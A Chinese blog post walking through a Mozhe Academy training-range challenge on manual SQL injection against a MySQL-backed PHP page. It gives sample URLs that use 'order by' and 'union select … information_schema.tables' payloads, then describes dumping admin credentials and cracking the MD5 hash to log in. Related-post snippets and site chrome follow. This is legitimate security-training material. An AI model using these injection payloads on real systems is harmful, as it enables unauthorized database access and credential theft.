【墨者学院】SQL手工注入漏洞测试(MySQL数据库)

已于 2024-07-22 21:03:53 修改
阅读量352 收藏 7
点赞数 5
分类专栏: 墨者学院攻略 文章标签: 数据库 sql mysql
于 2024-07-22 20:59:51 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57240513/article/details/140619034
版权

一、链接地址:SQL手工注入漏洞测试(MySQL数据库)_SQL注入_在线靶场_墨者学院_专注于网络安全人才培养

二、了解靶场,击败靶场

背景介绍

安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。

实训目标

1.掌握SQL注入原理;
2.了解手工注入的方法;
3.了解MySQL的数据结构;
4.了解字符串的MD5加解密;

解题方向

手工进行SQL注入测试,获取管理密码登录。

三、解题步骤

1、启动靶场环境

2、点击访问 

3、查找到sql注入点在滚动窗口 ,点击打开

4、判断注入类型为数字型注入

5、判断出有4列,因为order by 5时页面无显示http://124.70.64.48:48206/new_list.php?id=1 order by 4 #

6、union select 联合查询判断回显位置

7、接下来查看表名,语句为:http://124.70.64.48:48206/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database() #

 8、查询字段,也就是账号密码

8、使用查出的账号密码(密码需要使用MD5解密),登陆即可

1、MD5解密链接md5在线解密破解,md5解密加密

2、使用解密后的密码登陆、得到KEY

Mr.sloane
关注
  • 5
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入-墨者学院SQL手工注入漏洞测试(MySQL数据库)
m0_75178803的博客
04-15 834
猜解列名字段数(数量) order by x 错误与正常的正常值的的连接点。union select 1,2,3,4 页面正常。回到题目上来,我们在id=1后面随意输入一些东西。order by 4,页面正常。order by 1,网站正常。order by 5,页面错误。文章基于小迪sql注入的复现。页面错误,说明id为注入点。我们即可得知有4个字段数。and 1=1 页面正常。and 1=2 页面错误。
墨者学院SQL手工注入漏洞测试(MySQL数据库)
Lakers248_的博客
05-14 450
解题思路+知识点
墨者靶场SQL手工注入漏洞测试(MySQL数据库-字符型)
zyh1588的博客
11-01 211
小白回顾墨者靶场手工注入
墨者靶场SQL手工注入漏洞测试(MySQL数据库)通关思路
zyh1588的博客
11-01 1249
小白回顾墨者靶场sql手工注入
墨者学院——SQL手工注入漏洞测试(MySQL数据库)》
weixin_47118413的博客
06-21 2371
背景介绍 安全工程师"墨者"最近在练习SQL手工注入漏洞,自己刚搭建好一个靶场环境Nginx+PHP+MySQL,PHP代码对客户端提交的参数未做任何过滤。尽情的练习SQL手工注入吧。
墨者靶场 post ,DB2,绕过登录,sql注入四关
07-22
通关攻略墨者靶场 post ,DB2,绕过登录,sql注入四关
墨者学院-HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)
05-29
HTML前端代码分析(暗链)、HTTP动作练习、IP地址伪造(第2题)、phpMyAdmin后台文件包含分析溯源、PHP代码分析溯源(第1题)、PHP代码分析溯源(第2题)、PHP逻辑漏洞利用实战(第1题)、SQL手工注入漏洞测试(Access数据库)
WebShell文件上传漏洞分析溯源
02-22
2. 渗透测试:通过渗透测试来检测Web应用程序是否存在文件上传漏洞。 3. 漏洞扫描:使用漏洞扫描工具来检测Web应用程序是否存在文件上传漏洞。 六、WebShell 文件上传漏洞的实践案例 在这个实践案例中,我们使用...
spring IOC实现(墨者革离)
12-12
在这个名为"spring_IOC实现(墨者革离)"的项目中,我们可以通过模拟城门叩问的编剧场景来理解这一概念。 首先,控制反转的基本思想是将对象的创建和依赖关系的管理从应用程序中分离出来,交给一个外部容器(在...
墨者未必黑.pdf
12-26
墨者未必黑.pdf
OAuth2.0 or Spring Session or 单点登录流程
qq_53374893的博客
07-20 440
一句话精辟解释: 在过滤器放行的时候,偷偷的把原生的 request 和 response 对象换成了它的实现,也就是 调用getSession 的时候拿到的 其实是对redis 操作的Session。但其他的操作还是使用原生的,只不过重写的方法,调用的是子类的,也就是往 redis 里放入 Session,把原生的操作给替换了!分布式Session原理,使用子域名,的时候放入父域名的 JsessionId 然后将这个ID 的所存的内容放入Redis ,这样实现不同域名共享同一sessionID.
redis+spring面试题
github_36510643的博客
07-21 415
redis+spring面试题
基于JSP的高校信息资源共享平台
heye0910032的博客
07-22 660
高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。通过使用JSP技术和MySQL数据库,本系统实现了一个稳定、安全、易用的高校信息资源管理平台。虽然在开发过程中遇到了一些技术挑战,但通过不断学习和实践,最终完成了一个能够满足用户需求的系统。未来,我们将继续优化系统功能,提升用户体验,以期达到更高的应用价值和社会效益。高校信息资源共享平台的开发和实现,为高校信息资源的管理和共享提供了一个有效的解决方案。
docker容器
2401_83945639的博客
07-20 951
root@lvs-server ~]# docker start 8a1e7f458daf --手动start启动。-v 目录映射【宿主机的目录映射给容器的某个目录,将容器中的目录挂载到宿主机的目录中】docker rm -f $(docker ps -aq) 删除所有的容器。docker rm -f cname 强制删除,可以删除正在运行的容器。-p 端口映射【宿主机的端口映射给容器的某个端口】创建容器并运行 --这个是mysql的容器。docker ps -q 查看所有容器id。
04-用户画像+sqoop使用
weixin_46567476的博客
07-21 551
sqoop的作用是实现数据的导入和导出,主要是对数据库和数据仓库之间的操作。qoop脚本就是将sqoop指令写入shell文件 后缀是 .sh。只要是支持jdbc连接的数据库都可以使用sqoop操作。
sqlalchemy使用json_unquote函数的mysql like查询
最新发布
ithongchou的博客
07-23 1020
为您自己的数据库连接信息,并根据实际表结构修改模型类。函数查询MySQL JSON字段可以通过使用。下面是一个示例,假设有一个名为。请确保替换示例代码中的数据库连接字符串(在SQLAlchemy中使用。的表,其中包含一个名为。
MongoDB教程(十五):MongoDB原子操作
菜鸟小码的博客
07-21 826
在多线程或分布式环境中,保证数据一致性是一项重大挑战。原子操作是解决这一问题的关键技术之一,它确保一系列操作要么全部成功,要么全部失败,从而维持数据的完整性和一致性。MongoDB 提供了一系列内置的原子操作,使开发者能够轻松地在数据库层面实现事务性和数据完整性。本文将深入探讨 MongoDB 中的原子操作,包括更新、插入和删除操作的原子性,并通过具体案例代码展示如何在实际应用中运用这些原子操作。
linux中使用docker安装mongodb
qq_56661788的博客
07-20 726
v /data/mongo/config/mongod.conf:/etc/mongod.conf:将主机上的/data/mongo/config/mongod.conf文件挂载到容器的/etc/mongod.conf位置,作为 MongoDB 的配置文件。-v /data/mongo/logs:/var/log/mongodb:将主机上的/data/mongo/logs目录挂载到容器的/var/log/mongodb位置,作为 MongoDB 的日志存储目录。登录阿里云,开通容器镜像服务,进入控制台。
SuperMap GIS基础产品FAQ集锦(20240715)
SuperMap技术控
07-22 755
SuperMap GIS基础产品FAQ集锦(20240715)
墨者-sql手工注入漏洞测试
04-29
墨者安全团队是一支专注于网络安全领域的团队,他们致力于网络安全研究和技术推广。其中,手工注入漏洞测试是他们的一项重要工作之一。 在进行手工注入漏洞测试时,墨者安全团队通常会通过一系列的步骤来进行测试。首先,他们会对目标网站进行初步信息收集,包括了解目标网站的架构、数据库类型、应用程序等等。然后,他们会通过手工注入的方式对目标网站进行攻击,以确定是否存在注入漏洞,并尝试获取敏感信息。 在手工注入的过程中,墨者安全团队通常会使用一些工具来辅助测试,例如Burp Suite、SQLMap等。同时,他们也会根据目标网站的具体情况进行一些自定义的测试,以提高测试效果。 总的来说,墨者安全团队的手工注入漏洞测试方法比较系统和全面,可以有效地发现目标网站中存在的注入漏洞,从而帮助企业提高网络安全防护水平。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值